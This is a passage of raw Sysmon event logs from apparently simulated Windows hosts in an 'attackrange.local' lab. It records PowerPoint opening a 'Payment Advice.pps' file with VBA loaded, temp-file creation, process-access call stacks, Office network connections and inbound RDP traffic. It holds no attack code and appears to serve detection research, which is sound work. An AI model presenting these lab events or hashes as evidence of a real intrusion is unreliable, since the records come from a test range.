Office\Root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+171074|C:\Windows\System32\windows.storage.dll+14130c|C:\Windows\System32\windows.storage.dll+1410e8|C:\Windows\System32\windows.storage.dll+3dba90|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739d5|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000082020Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.981{A7A01FEF-EC53-607E-6B0F-00000000BB01}36286052C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+171074|C:\Windows\System32\windows.storage.dll+14130c|C:\Windows\System32\windows.storage.dll+1410e8|C:\Windows\System32\windows.storage.dll+3dba90|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174510|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173b6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1739d5|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175891|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082019Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.965{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082018Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.965{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000082017Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.965{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Office\Recent\Payment Advice.pps.LNK2021-04-20 14:59:17.965 10341000x800000000000000082016Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.965{A7A01FEF-C0A6-607E-8105-00000000BB01}8366912C:\Windows\Explorer.EXE{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\windows.storage.dll+3c6d1e|C:\Windows\System32\windows.storage.dll+3c8d0e|C:\Windows\System32\windows.storage.dll+13c3e3|C:\Windows\System32\windows.storage.dll+13bdd9|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082015Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.965{A7A01FEF-C0A6-607E-8105-00000000BB01}8366912C:\Windows\Explorer.EXE{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\windows.storage.dll+3c9e7e|C:\Windows\System32\windows.storage.dll+3c5b4f|C:\Windows\System32\windows.storage.dll+3c6c90|C:\Windows\System32\windows.storage.dll+3c8d0e|C:\Windows\System32\windows.storage.dll+13c3e3|C:\Windows\System32\windows.storage.dll+13bdd9|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082014Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.965{A7A01FEF-EC53-607E-6B0F-00000000BB01}36281360C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+3c73e8|C:\Windows\System32\windows.storage.dll+3cb9df|C:\Windows\System32\windows.storage.dll+3cbf38|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175394|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175279|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082013Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.965{A7A01FEF-EC53-607E-6B0F-00000000BB01}36281360C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+3c73cc|C:\Windows\System32\windows.storage.dll+3cb9df|C:\Windows\System32\windows.storage.dll+3cbf38|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175394|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175279|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000082012Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.965{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Office\Recent\Payment Advice.pps.LNKMD5=5276F6A5CE743C585E31667AEFA9FCAF,SHA256=80354CEB2FCE201574F4C767A4E792FD5B6A8CC77D842CBDA61193A091F07EE8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082011Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.965{A7A01FEF-EC53-607E-6B0F-00000000BB01}36281360C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+3c73cc|C:\Windows\System32\windows.storage.dll+3cb9df|C:\Windows\System32\windows.storage.dll+3cbf38|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175394|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175279|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70cfc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000082010Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.965{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXEC:\Temp\~$Payment Advice.ppsMD5=BF08584F3AEB59EF0EDA0F39C76CDEB7,SHA256=25728763F1B23C6337462291FE17A89AF10C166B253B3509F7B1887C1978462D,IMPHASH=00000000000000000000000000000000falsetrue 734700x800000000000000082009Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.949{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL7.01.1091Visual Basic Environment International ResourcesVisual Basic EnvironmentMicrosoft Corporation-MD5=CDA3EA478C604783B76964E88FD7030D,SHA256=DEBCD9E5DA29B2675C95055DBC342B74369BB5ED34ED5BAFC0738F470D5B4E69,IMPHASH=00000000000000000000000000000000trueMicrosoft CorporationValid 734700x800000000000000082008Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.934{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL7.1.16.13127Microsoft Visual Basic for Applications componentMicrosoft Visual Basic for ApplicationsMicrosoft CorporationVBEUI.DLLMD5=F61ACCA99010E982D1E25BB1DCACCF30,SHA256=89B47B853D071F3862E57037180555D13264D3B521253EB985863065FC27EF68,IMPHASH=F167294CA50F7D378B96DB3328869523trueMicrosoft CorporationValid 23542300x800000000000000082007Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.902{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D82497A2E38913C7E7B33FE28756BAB3,SHA256=E7B6656D606458AC12F15BE492E9434D845DACD1937BC467766D47300731A937,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082006Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.856{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\~DF071881B7327DBAC9.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000082005Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.856{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\~DF7090825969E2F267.TMPMD5=7F26A9A90CC3E9CED881ACD918E6F3AB,SHA256=DA1A75506F3888B77E4C90334FF19CAC255ED55D6B1FDADB4B285536F8C57D34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082004Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.762{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=5A18163E67C27D3F1E4112E5DF8F399C,SHA256=B13B04FCD74763EF42339BF90A32A9A8C9F17D100145F07FB3809AD174345068,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082003Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.762{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=6A7FFAC5A44FDABEA2A5286CB21D8AD0,SHA256=FD1738A31C5CC30EEA8EF757D3620EF1C01EDB31F7F7D5DEECBD7699E15CB068,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082002Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.699{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=090B26418BAA0CE5EFF380B71E5CAB30,SHA256=1E17A1D387BA0C29709DB0F82F97244A3FD6A9E62CFF65DD7F39763DC5205662,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082001Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.309{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=F67F29F070D82461128B535AF0FE7E2A,SHA256=71E5376570DE583238CC479D23609D6A9CA9E68466F0499291C2A450C1E96F41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082000Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.184{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=796A241E483C2F111B360EF09BBAC90D,SHA256=B75E013F15799E56DA4BB3EF87F8EFAEFC50B679BFD027BEDF8FC7232693B240,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081999Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.106{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=05E798EA83BB8E0783E2B107144D5E95,SHA256=7DB47FE1314B77DE8A25071A63F39529BBE3D2CA041D3AFC0699C5DB81B95812,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081998Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.106{A7A01FEF-EC54-607E-6C0F-00000000BB01}12047048C:\Windows\system32\sppsvc.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\KERNELBASE.dll+221bd|C:\Windows\system32\sppsvc.exe+8d889|C:\Windows\system32\sppsvc.exe+7ec28|C:\Windows\system32\sppsvc.exe+749f0|C:\Windows\system32\sppsvc.exe+95a0e|C:\Windows\system32\sppsvc.exe+54717|C:\Windows\system32\sppsvc.exe+a1ebb|C:\Windows\system32\sppsvc.exe+b429a|C:\Windows\system32\sppsvc.exe+b458f|C:\Windows\system32\RPCRT4.dll+7a593|C:\Windows\system32\RPCRT4.dll+d9f41|C:\Windows\system32\RPCRT4.dll+62d4c|C:\Windows\system32\RPCRT4.dll+4a274|C:\Windows\system32\RPCRT4.dll+4918d|C:\Windows\system32\RPCRT4.dll+49a3b|C:\Windows\system32\RPCRT4.dll+310ac|C:\Windows\system32\RPCRT4.dll+3152c|C:\Windows\system32\RPCRT4.dll+1ae1c|C:\Windows\system32\RPCRT4.dll+1c67b|C:\Windows\system32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\KERNEL32.DLL+84d4 10341000x800000000000000081997Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.106{A7A01FEF-EC54-607E-6C0F-00000000BB01}12047048C:\Windows\system32\sppsvc.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\KERNELBASE.dll+221bd|C:\Windows\system32\sppsvc.exe+8d889|C:\Windows\system32\sppsvc.exe+74b0a|C:\Windows\system32\sppsvc.exe+959c1|C:\Windows\system32\sppsvc.exe+54717|C:\Windows\system32\sppsvc.exe+a1ebb|C:\Windows\system32\sppsvc.exe+b429a|C:\Windows\system32\sppsvc.exe+b458f|C:\Windows\system32\RPCRT4.dll+7a593|C:\Windows\system32\RPCRT4.dll+d9f41|C:\Windows\system32\RPCRT4.dll+62d4c|C:\Windows\system32\RPCRT4.dll+4a274|C:\Windows\system32\RPCRT4.dll+4918d|C:\Windows\system32\RPCRT4.dll+49a3b|C:\Windows\system32\RPCRT4.dll+310ac|C:\Windows\system32\RPCRT4.dll+3152c|C:\Windows\system32\RPCRT4.dll+1ae1c|C:\Windows\system32\RPCRT4.dll+1c67b|C:\Windows\system32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000081996Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.074{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=8BDA453B38231EC700B0E29280217291,SHA256=E7041A70F1F8BC99A43524D85D12D70868AD7D3D506D29BB71A5AFB94A7D7F20,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081995Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:31.713{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-24943-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000050805Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:33.839{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE866FC25D8C7DB7F8EE84CE19A9B571,SHA256=FEA1EE04293EBCD0382D70B77388010BAB868638D033650B7B2D04CEC253E943,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050804Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:30.267{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-59643-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000082047Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:34.949{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9D88A0E9C6475F3D02DF3D42F742B06,SHA256=7D59AC789C16624385D02F54A60999B205AB8A0326C888CB57F777EE48D31A70,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000082046Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.556{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628ecs.office.com0type: 5 ecs.office.trafficmanager.net;type: 5 s-0005-office.config.skype.com;type: 5 ecs-office.s-0005.s-msedge.net;type: 5 s-0005.s-msedge.net;::ffff:52.113.194.132;C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE 354300x800000000000000082045Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.584{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57652-false40.126.31.141-443https 354300x800000000000000082044Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.580{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57653-false104.75.88.23a104-75-88-23.deploy.static.akamaitechnologies.com443https 354300x800000000000000082043Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.570{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57651-false52.113.194.132-443https 354300x800000000000000082042Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.554{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local60649- 23542300x800000000000000082041Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:34.012{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7540D88482451062DDA30FC06C2CB1E1,SHA256=AA5E0EA0079D40E3CB35A2896784F8239F0FFDCD4F3A0D6A45CDD90F427F96C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050808Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:34.839{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B593B722304B64111C69E40B98047750,SHA256=7A57F12CAAAA857C712A8BBB555E98D198AC2AFF1FF387DDF41D66E63DF2F0AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050807Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:34.371{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=31FAAF20ECFEF0A615D43EA45FFEE692,SHA256=34CDA3281ECF5D601ACB1D051A7CFACDF7290B1A53DCC22D70A606FDDD2F047B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050806Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:31.770{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-61113-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000082051Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:35.965{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38BDD580414F3B06DA8F791C671ADFC2,SHA256=16FD0F4B7E4426E2CFAEB7126A9BDCB0A07ED2D0C553C47BF435ABBA3117F607,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082050Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:35.809{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 